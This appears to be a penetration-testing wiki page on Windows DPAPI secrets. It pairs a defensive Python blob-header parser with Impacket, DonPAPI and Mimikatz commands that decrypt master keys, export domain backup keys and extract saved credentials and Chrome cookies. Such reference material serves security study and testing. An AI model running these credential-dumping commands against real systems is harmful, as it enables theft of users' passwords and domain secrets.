DPAPI secrets
MITRE ATT&CK™ Sub-technique T1555.003

Theory

The DPAPI (Data Protection API) is an internal component of the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data is stored in the user's directory and is secured by user-specific master keys derived from the user's password. The master key files are usually located at:

C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
Applications like Google Chrome, Outlook, Internet Explorer and Skype use DPAPI. Windows also uses that API for sensitive information like Wi-Fi passwords, certificates, RDP connection passwords, and many more.
Below are common paths of hidden files that usually contain DPAPI-protected data.

C:\Users\$USER\AppData\Local\Microsoft\Credentials\
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
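As a triage helper added here (not code from the page or from any of the tools it lists), the following Python parses the header of a DPAPI blob such as those stored in the files above and reports which master key GUID it depends on, without decrypting anything; a responder can use it to confirm a file is DPAPI-protected and to map it to the master key folder it needs. The header layout and provider GUID are those of the Windows DPAPI blob format; the sample blob, its master key GUID and its ciphertext are constructed.

```python
import struct
import uuid

# Provider GUID that follows the 4-byte version field in every DPAPI blob (CryptProtectData output).
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA-1", 0x800E: "SHA-512"}  # CryptoAPI ALG_IDs

def parse_dpapi_blob(blob: bytes) -> dict:
    """Parse a DPAPI blob header. Nothing is decrypted; only metadata is returned."""
    pos = [0]
    def take(n):  # read n bytes, refusing to run past the end of a truncated blob
        if pos[0] + n > len(blob):
            raise ValueError("truncated DPAPI blob")
        pos[0] += n
        return blob[pos[0] - n:pos[0]]
    def u32():
        return struct.unpack("<I", take(4))[0]
    if u32() != 1 or uuid.UUID(bytes_le=take(16)) != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    info = {"masterkey_version": u32(), "masterkey_guid": str(uuid.UUID(bytes_le=take(16))), "flags": u32()}
    info["description"] = take(u32()).decode("utf-16-le").rstrip("\x00")
    info["crypt_alg"], _ = ALG_NAMES.get(u32(), "unknown"), u32()   # cipher ALG_ID, then key bits
    info["salt_len"] = len(take(u32()))
    take(u32())                                                      # strong-key HMAC key, usually empty
    info["hash_alg"], _ = ALG_NAMES.get(u32(), "unknown"), u32()    # hash ALG_ID, then hash bits
    take(u32())                                                      # second HMAC key, usually empty
    info["data_len"], info["sign_len"] = len(take(u32())), len(take(u32()))
    info["total_len"] = pos[0]
    return info

def find_dpapi_blobs(data: bytes) -> list:
    """Locate every DPAPI blob embedded in a file (e.g. one under Credentials\\) via its provider GUID."""
    sig, found, start = DPAPI_PROVIDER_GUID.bytes_le, [], 0
    while (idx := data.find(sig, start)) != -1:
        if idx >= 4:
            try:
                found.append(parse_dpapi_blob(data[idx - 4:]))
            except ValueError:
                pass                 # GUID inside non-blob data, or a truncated blob
        start = idx + len(sig)
    return found

def build_sample_blob(masterkey_guid: str, description: str = "Sample") -> bytes:
    """Constructed test blob: real header layout, dummy (non-decryptable) salt, ciphertext and HMAC."""
    lv = lambda b: struct.pack("<I", len(b)) + b
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le + struct.pack("<I", 1)
            + uuid.UUID(masterkey_guid).bytes_le + struct.pack("<I", 0)
            + lv((description + "\x00").encode("utf-16-le")) + struct.pack("<II", 0x6610, 256)
            + lv(b"\x11" * 32) + lv(b"") + struct.pack("<II", 0x800E, 512) + lv(b"")
            + lv(b"\x22" * 48) + lv(b"\x33" * 64))
```

Feed `find_dpapi_blobs()` the raw bytes of a suspected file; each returned `masterkey_guid` names the `$GUID` file under the Protect directory that the blob was encrypted with.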

Practice

UNIX-like

From UNIX-like systems, DPAPI data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), and Impacket's dpapi.py and secretsdump.py (Python).
# (not tested) Decrypt a master key
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $MASTERKEY_PASSWORD

# (not tested) Obtain the backup keys & use them to decrypt a master key
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET --export
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"

# (not tested) Decrypt DPAPI-protected data using a master key
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
DonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.

DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>
Windows

On Windows systems, Mimikatz (C) can be used to extract, decrypt or use specific master keys, given the corresponding passwords or sufficient privileges.

# Extract and decrypt a master key
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /sid:$SID /password:$PASSWORD /protected

# Extract and decrypt all master keys
sekurlsa::dpapi

# Extract the backup keys & use them to decrypt a master key
lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export
dpapi::masterkey /in:"C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID" /pvk:$BACKUP_KEY_EXPORT_PVK

# Decrypt Chrome data
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"

# Decrypt DPAPI-protected data using a master key
dpapi::cred /in:"C:\path\to\encrypted\file" /masterkey:$MASTERKEY

Resources

DPAPI - Extracting Passwords
HackTricks